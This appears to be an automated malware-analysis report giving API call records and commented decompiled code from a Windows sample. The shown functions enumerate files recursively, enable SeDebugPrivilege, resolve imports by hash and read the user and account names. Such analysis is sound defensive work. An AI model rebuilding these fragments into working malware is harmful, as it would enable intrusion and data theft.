                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0097BCA6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 2d8b9a3c98e33bf37b91c72541717d24bcc14a2ec8fbcba2f1a5c20f36ce24f8
                                              • Instruction ID: 2e45edc1f49c4d6bd47cb07e79a56b355de915b16296b581b18ff021aeb3332c
                                              • Opcode Fuzzy Hash: 2d8b9a3c98e33bf37b91c72541717d24bcc14a2ec8fbcba2f1a5c20f36ce24f8
                                              • Instruction Fuzzy Hash: F7713571A00B058FDB64DF6AD4457AABBF5BF88304F00892ED58AD7A50DB34E8498B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097E02A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 22866c3570fa8cb1734e4e1d3dd56586fb89be934b1e1640578e164c69440ac5
                                              • Instruction ID: 9611408f6b8717dd5c56db00974d8399b5fa4c21f01b9cc1484596b7080d6b0b
                                              • Opcode Fuzzy Hash: 22866c3570fa8cb1734e4e1d3dd56586fb89be934b1e1640578e164c69440ac5
                                              • Instruction Fuzzy Hash: 545103B1D04308DFDB14CFA9D884ADEBBB5FF88314F24852AE419AB251D774A885CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097E02A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: e4deea049f15f225cbdc4bea2cf978cf6e8121f9c4ea0568173d2760537bc475
                                              • Instruction ID: 1787c4ca8ede46a446dce2e35fd10bc98867f43ad3dd2c84f2a14f77569ce58a
                                              • Opcode Fuzzy Hash: e4deea049f15f225cbdc4bea2cf978cf6e8121f9c4ea0568173d2760537bc475
                                              • Instruction Fuzzy Hash: 6D51DFB1D04308DFDB14CF99C884ADEBBB5FF48314F24852AE819AB210D774A985CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097E02A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: d73e099e4a24324d11a5a9e1541158c11d6898a6a96affdcc147c5e063bfd048
                                              • Instruction ID: 7efb6db5d40dc9a2711c58ee76db2b05519a418ec19ca2f9afe82f27c0910578
                                              • Opcode Fuzzy Hash: d73e099e4a24324d11a5a9e1541158c11d6898a6a96affdcc147c5e063bfd048
                                              • Instruction Fuzzy Hash: 1C51C0B1D00309DFDF14CFA9D984ADEBBB5BF48314F24852AE819AB250D7B49985CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00977107
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 82e514702c5aae2ba5211cc25ae43e1226ad767435b2d162c9520d11424af4d1
                                              • Instruction ID: 8a1efa478f26b8e29fe973c1348e38d8a1ced8212bc0a3f81dd1ef654b86b067
                                              • Opcode Fuzzy Hash: 82e514702c5aae2ba5211cc25ae43e1226ad767435b2d162c9520d11424af4d1
                                              • Instruction Fuzzy Hash: 64415776904248DFCF01CFA9D844AEEBBF5EF88310F14806AE954A7361D7349955CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00977107
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: ffee03c10b95d64da8c42fa69267fa63d7b9d6630840c4b5bf1bbf1e06c20ae3
                                              • Instruction ID: c558d521581d82a6555cff85a7fb10481da60a281a9f3f10a9c5a163c3b18c35
                                              • Opcode Fuzzy Hash: ffee03c10b95d64da8c42fa69267fa63d7b9d6630840c4b5bf1bbf1e06c20ae3
                                              • Instruction Fuzzy Hash: 1421E4B59042089FDB10CF99D984AEEFBF8FB48320F14841AE918A7350D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00977107
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f93cd4b6c09c05eaf98c74b69e084a85beba7e399e1606b8168acd252dca03c0
                                              • Instruction ID: fe270990353f61ee854a762a37bf2b1ca2be5a5715c65a03857788dceac86498
                                              • Opcode Fuzzy Hash: f93cd4b6c09c05eaf98c74b69e084a85beba7e399e1606b8168acd252dca03c0
                                              • Instruction Fuzzy Hash: 2D21FFB6900209DFDB00CFA9D984AEEBBF4EB48324F14841AE919B7250D378A954CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0097BD21,00000800,00000000,00000000), ref: 0097BF32
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 7c4034ef32e626bff87b4ac24a9f36dee7fcb309e259bb989b8ea353a9d8ad8b
                                              • Instruction ID: a2cf95031772264b3c67fc04bb59fd818fdd50918a2b072c8fb85cf37df65694
                                              • Opcode Fuzzy Hash: 7c4034ef32e626bff87b4ac24a9f36dee7fcb309e259bb989b8ea353a9d8ad8b
                                              • Instruction Fuzzy Hash: 881114B29043088FCB10DF9AD844BDEFBF8EF48714F11842AE519A7240C774A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0097BD21,00000800,00000000,00000000), ref: 0097BF32
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: f2edc05925c3a66af3d10479c7d55c5b120511a0ca6eb45cc9be1b9c8af8a756
                                              • Instruction ID: 9c873b5f95ef76667afac975b5555514d5dfbbffc6a62163b923c7e70c95db4a
                                              • Opcode Fuzzy Hash: f2edc05925c3a66af3d10479c7d55c5b120511a0ca6eb45cc9be1b9c8af8a756
                                              • Instruction Fuzzy Hash: 921112B69002098FCB10DFAAD984BDEFBF4AB88314F15842AD419B7250C774A949CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0097BCA6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: ec240a43b280faed03a50729f9cdc0eb5098933c082cca5f1b9d8906f8a27dc4
                                              • Instruction ID: 5679228e22e48f185ac44626b8c5a9397eefa92fea4fb9596c764ddff8729ce5
                                              • Opcode Fuzzy Hash: ec240a43b280faed03a50729f9cdc0eb5098933c082cca5f1b9d8906f8a27dc4
                                              • Instruction Fuzzy Hash: 6F11FDB28002498BCB10CF9AD944BDEBBF8AB88324F15C41AD859B7600D778A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 0097E1BD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: 4f56d006acc54de88bf110de2adbbf090acc7cf18a9740309a486ebe714dc191
                                              • Instruction ID: 84e65afa0b60229c1e2d142a8a1ec5033927fedbc44afcef068e004194435746
                                              • Opcode Fuzzy Hash: 4f56d006acc54de88bf110de2adbbf090acc7cf18a9740309a486ebe714dc191
                                              • Instruction Fuzzy Hash: E91100B69002089FDB10CF99D985BDEBBF8EB88320F10845AE919B7740D374A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 0097E1BD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: 8fdc4d841e00035be57ee636d00a178075f1c54f2d0030bf6162eba106bb03b1
                                              • Instruction ID: fa1724ace2361555682524b23d9189521e8f62514a635f3186d090f65b8291b0
                                              • Opcode Fuzzy Hash: 8fdc4d841e00035be57ee636d00a178075f1c54f2d0030bf6162eba106bb03b1
                                              • Instruction Fuzzy Hash: BD11D0B59002499FDB10CF99D985BDEBBF8EB48324F10845AD919A7740D374A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 812f8ad6f16c6d84290a39f0b61e01aaa4d6f14ca9acbeb20112529301d0e14e
                                              • Instruction ID: 787098e58a4c848cdc20978b635150eadb050072814b455d41f140f28c75e5f0
                                              • Opcode Fuzzy Hash: 812f8ad6f16c6d84290a39f0b61e01aaa4d6f14ca9acbeb20112529301d0e14e
                                              • Instruction Fuzzy Hash: 37A14E32E002198FCF05DFA5D8446DEBBB6FFC5300B15856AE919BB221EB35A955CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c33696d2635d6ccd726495377053b3bda6e6f4389ada009f3971a3a0472bf83d
                                              • Instruction ID: 75728cd0b5998a831ea7efdac921eb8a4a6455690b235b569af627dcf2e014c8
                                              • Opcode Fuzzy Hash: c33696d2635d6ccd726495377053b3bda6e6f4389ada009f3971a3a0472bf83d
                                              • Instruction Fuzzy Hash: 62C121B182AF45CBE712CF6DEC8418A3B71BB45324F52430AD1616B6F0D7B9144AEF58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              C-Code - Quality: 85%
                                              			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                              				struct _WIN32_FIND_DATAW _v596;
                                              				void* __ebx;
                                              				void* _t35;
                                              				int _t43;
                                              				void* _t52;
                                              				int _t56;
                                              				intOrPtr _t60;
                                              				void* _t66;
                                              				void* _t73;
                                              				void* _t74;
                                              				WCHAR* _t98;
                                              				void* _t99;
                                              				void* _t100;
                                              				void* _t101;
                                              				WCHAR* _t102;
                                              				void* _t103;
                                              				void* _t104;
                                              
                                              				L004067C4(0xa); // executed
                                              				_t72 = 0;
                                              				_t100 = 0x2e;
                                              				_t106 = _a16;
                                              				if(_a16 == 0) {
                                              					L15:
                                              					_push(_a8);
                                              					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                                              					_t104 = _t103 + 0xc;
                                              					if(_t98 == 0) {
                                              						L30:
                                              						__eflags = 0;
                                              						return 0;
                                              					}
                                              					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                              					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                              					_t73 = _t35;
                                              					if(_t73 == 0xffffffff) {
                                              						L29:
                                              						E00402BAB(_t98);
                                              						goto L30;
                                              					}
                                              					L17:
                                              					while(1) {
                                              						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                                              							if(_v596.dwFileAttributes != 0x10) {
                                              								L21:
                                              								_push( &(_v596.cFileName));
                                              								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                              								_t104 = _t104 + 0xc;
                                              								if(_t101 == 0) {
                                              									goto L24;
                                              								}
                                              								if(_a12 == 0) {
                                              									E00402BAB(_t98);
                                              									E00403BEF(_t73);
                                              									return _t101;
                                              								}
                                              								_a12(_t101);
                                              								E00402BAB(_t101);
                                              								goto L24;
                                              							}
                                              							_t124 = _a20;
                                              							if(_a20 == 0) {
                                              								goto L24;
                                              							}
                                              							goto L21;
                                              						} else {
                                              							L24:
                                              							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                              							_t43 = FindNextFileW(_t73,  &_v596); // executed
                                              							if(_t43 == 0) {
                                              								E00403BEF(_t73); // executed
                                              								goto L29;
                                              							}
                                              							_t100 = 0x2e;
                                              							continue;
                                              						}
                                              					}
                                              				}
                                              				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                                              				if(_t102 == 0) {
                                              					L14:
                                              					_t100 = 0x2e;
                                              					goto L15;
                                              				}
                                              				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                              				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                                              				_t74 = _t52;
                                              				if(_t74 == 0xffffffff) {
                                              					L13:
                                              					E00402BAB(_t102);
                                              					_t72 = 0;
                                              					goto L14;
                                              				} else {
                                              					goto L3;
                                              				}
                                              				do {
                                              					L3:
                                              					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                              						goto L11;
                                              					}
                                              					if(_a24 == 0) {
                                              						L7:
                                              						if(E00405D24( &(_v596.cFileName)) >= 3) {
                                              							L9:
                                              							_push( &(_v596.cFileName));
                                              							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                              							_t103 = _t103 + 0xc;
                                              							_a16 = _t60;
                                              							_t115 = _t60;
                                              							if(_t60 == 0) {
                                              								goto L11;
                                              							}
                                              							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                                              							E00402BAB(_a16);
                                              							_t103 = _t103 + 0x1c;
                                              							if(_t99 != 0) {
                                              								E00402BAB(_t102);
                                              								E00403BEF(_t74);
                                              								return _t99;
                                              							}
                                              							goto L11;
                                              						}
                                              						_t66 = 0x2e;
                                              						_t114 = _v596.cFileName - _t66;
                                              						if(_v596.cFileName == _t66) {
                                              							goto L11;
                                              						}
                                              						goto L9;
                                              					}
                                              					_push(L"Windows");
                                              					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                              						goto L11;
                                              					}
                                              					_push(L"Program Files");
                                              					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                              						goto L11;
                                              					}
                                              					goto L7;
                                              					L11:
                                              					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                              					_t56 = FindNextFileW(_t74,  &_v596); // executed
                                              				} while (_t56 != 0);
                                              				E00403BEF(_t74); // executed
                                              				goto L13;
                                              			}

                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FileFind$FirstNext
                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                              • API String ID: 1690352074-2009209621
                                              • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                              • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			// Enables SeDebugPrivilege in the current process token, which lets the process
                                              			// open handles to processes owned by other users. E004031E5() is the sample's
                                              			// hash-based import resolver: its second argument is 9 for every advapi32
                                              			// export resolved on this page and 0 for the kernel32 export CreateFileW in
                                              			// E004040BB (consistent with a module index), its third is a 32-bit hash of the
                                              			// export name. Export names given for hashed calls are inferred from the
                                              			// argument patterns, not recovered from the binary.
                                              			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                              				void* _v8;                      // token handle
                                              				struct _LUID _v16;              // LUID of SeDebugPrivilege
                                              				intOrPtr _v20;                  // Privileges[0].Attributes
                                              				intOrPtr _v24;                  // Privileges[0].Luid.HighPart
                                              				struct _TOKEN_PRIVILEGES _v32;  // PrivilegeCount and Privileges[0].Luid.LowPart
                                              				intOrPtr* _t13;
                                              				void* _t14;
                                              				int _t16;
                                              				int _t31;
                                              				void* _t32;
                                              
                                              				_t31 = 0;
                                              				E004060AC();                    // yields the process handle passed to the call below (GetCurrentProcess pattern)
                                              				_t32 = __eax;
                                              				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                              				// Argument pattern matches OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY (0x28), &hToken)
                                              				_t14 =  *_t13(_t32, 0x28,  &_v8);
                                              				if(_t14 != 0) {
                                              					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);   // resolves LookupPrivilegeValueW
                                              					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                              					if(_t16 != 0) {
                                              						_push(__ebx);
                                              						// Builds TOKEN_PRIVILEGES { PrivilegeCount = 1; Privileges[0] = { Luid, SE_PRIVILEGE_ENABLED (2) } },
                                              						// 0x10 bytes in total, which is the size passed to AdjustTokenPrivileges
                                              						_v32.Privileges = _v16.LowPart;
                                              						_v32.PrivilegeCount = 1;
                                              						_v24 = _v16.HighPart;
                                              						_v20 = 2;
                                              						E004031E5(1, 9, 0xc1642df2, 0, 0);       // resolves AdjustTokenPrivileges
                                              						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                              						// The decompiler dropped the operands of this comparison (0x0040658d-0x00406590);
                                              						// the flag records the outcome of the privilege adjustment and is the return value
                                              						_t31 =  !=  ? 1 : 0;
                                              					}
                                              					E00403C40(_v8);                          // releases the token handle (CloseHandle pattern, also used in E004061C3)
                                              					return _t31;
                                              				}
                                              				return _t14;
                                              			}
                                              
                                              Instruction addresses for the statements above (side column of the report): 0x00406512 0x00406514 0x00406522 0x00406524 0x00406530 0x00406534 0x0040653f 0x0040654e 0x00406552 0x0040655a 0x0040655f 0x0040656d 0x00406570 0x00406573 0x0040657a 0x00406589 0x0040658d 0x00406590 0x00406594 0x00000000 0x0040659a 0x004065a1

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 3615134276-2896544425
                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			// Zero-initialised heap allocation (calloc-style): RtlAllocateHeap on the
                                              			// process heap, then E00402B4E() clears the block (memset pattern, from the
                                              			// (ptr, 0, size) arguments). Returns NULL when the allocation fails. Every
                                              			// buffer on this page (token data, name buffers, the SOCKET slot) comes from here.
                                              			E00402B7C(long _a4) {
                                              				void* _t4;
                                              				void* _t7;
                                              
                                              				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                              				_t7 = _t4;
                                              				if(_t7 != 0) {
                                              					E00402B4E(_t7, 0, _a4);   // zero the new block
                                              				}
                                              				return _t7;
                                              			}
                                              
                                              Instruction addresses for the statements above (side column of the report): 0x00402b8c 0x00402b92 0x00402b96 0x00402b9e 0x00402ba3 0x00402baa

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			// Thin wrapper around GetUserNameW(buffer, &cch). The resolver call with hash
                                              			// 0xd4449184 immediately precedes the import, the same pattern as the other
                                              			// advapi32 calls on this page.
                                              			E00406069(WCHAR* _a4, DWORD* _a8) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 9, 0xd4449184, 0, 0);   // resolves GetUserNameW
                                              				_t4 = GetUserNameW(_a4, _a8); // executed
                                              				return _t4;
                                              			}
                                              
                                              Instruction addresses for the statements above (side column of the report): 0x00406077 0x00406082 0x00406085

                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                              • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			// Returns a heap string derived from the account behind the calling thread's
                                              			// token, falling back to the process token when the thread has none. Hashed
                                              			// calls go through the resolver E004031E5(); the export names in the comments
                                              			// are inferred from the argument patterns, not recovered from the binary.
                                              			// The value 0x414449 shown by the decompiler is an address inside the image
                                              			// (base 0x00400000); its bytes 49 44 41 read as ASCII "IDA", which is where the
                                              			// "IDA" String ID of this function comes from. It is not a string in the sample.
                                              			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                              				int _v8;          // token handle
                                              				long _v12;        // size reported by GetTokenInformation
                                              				int _v16;         // TOKEN_USER buffer
                                              				int _v20;         // first 0x208-byte (260 WCHAR) name buffer
                                              				char _v24;        // size in/out for the second buffer
                                              				char _v28;        // size in/out for the first buffer
                                              				char _v32;        // SID_NAME_USE output
                                              				intOrPtr* _t25;
                                              				int _t27;
                                              				int _t30;
                                              				int _t31;
                                              				int _t36;
                                              				int _t37;
                                              				intOrPtr* _t39;
                                              				int _t40;
                                              				long _t44;
                                              				intOrPtr* _t45;
                                              				int _t46;
                                              				void* _t48;
                                              				int _t49;         // second 0x208-byte buffer
                                              				void* _t67;
                                              				void* _t68;
                                              				void* _t74;
                                              
                                              				_t48 = __ebx;
                                              				_t67 = 0;
                                              				_v8 = 0;
                                              				E00402BF2();                                   // handle of the calling thread
                                              				_t68 = __eax;
                                              				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                              				_t2 =  &_v8; // 0x414449
                                              				_push(1);
                                              				_push(8);
                                              				_push(_t68);
                                              				// Argument pattern matches OpenThreadToken(hThread, TOKEN_QUERY (8), OpenAsSelf = TRUE, &hToken)
                                              				if( *_t25() != 0) {
                                              					L4:
                                              					_t27 = E00402B7C(0x208);                   // zeroed heap buffer (260 WCHARs)
                                              					_v20 = _t27;
                                              					__eflags = _t27;
                                              					if(_t27 != 0) {
                                              						E0040338C(_t27, _t67, 0x104);          // _wmemset(buf, 0, 260)
                                              						_t74 = _t74 + 0xc;
                                              					}
                                              					_push(_t48);
                                              					_t49 = E00402B7C(0x208);                   // second buffer of the same size
                                              					__eflags = _t49;
                                              					if(_t49 != 0) {
                                              						E0040338C(_t49, _t67, 0x104);
                                              						_t74 = _t74 + 0xc;
                                              					}
                                              					_v28 = 0x208;
                                              					_v24 = 0x208;
                                              					_t7 =  &_v8; // 0x414449
                                              					_v12 = _t67;
                                              					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);   // resolves GetTokenInformation
                                              					// First call with a NULL buffer, only to learn the required size (TokenUser = 1);
                                              					// it is expected to fail, which is why the success branch is the failure path
                                              					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                              					__eflags = _t30;
                                              					if(_t30 == 0) {
                                              						_t36 = E00402B7C(_v12);
                                              						_v16 = _t36;
                                              						__eflags = _t36;
                                              						if(_t36 != 0) {
                                              							_t14 =  &_v8; // 0x414449, executed
                                              							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed   (second GetTokenInformation, now with the buffer)
                                              							__eflags = _t37;
                                              							if(_t37 != 0) {
                                              								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                              								// Seven arguments, first NULL, second the SID at the start of TOKEN_USER: matches
                                              								// LookupAccountSidW(NULL, Sid, Name, &cchName, ReferencedDomainName, &cchDomain, &peUse)
                                              								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                              								__eflags = _t40;
                                              								if(__eflags != 0) {
                                              									// Formatted heap copy of the buffer passed in the fifth position (the
                                              									// domain name if the call is LookupAccountSidW); this is the return value
                                              									_t67 = E00405B6F(__eflags, L"%s", _t49);
                                              								}
                                              							}
                                              							E00402BAB(_v16);                       // frees the TOKEN_USER buffer
                                              						}
                                              					}
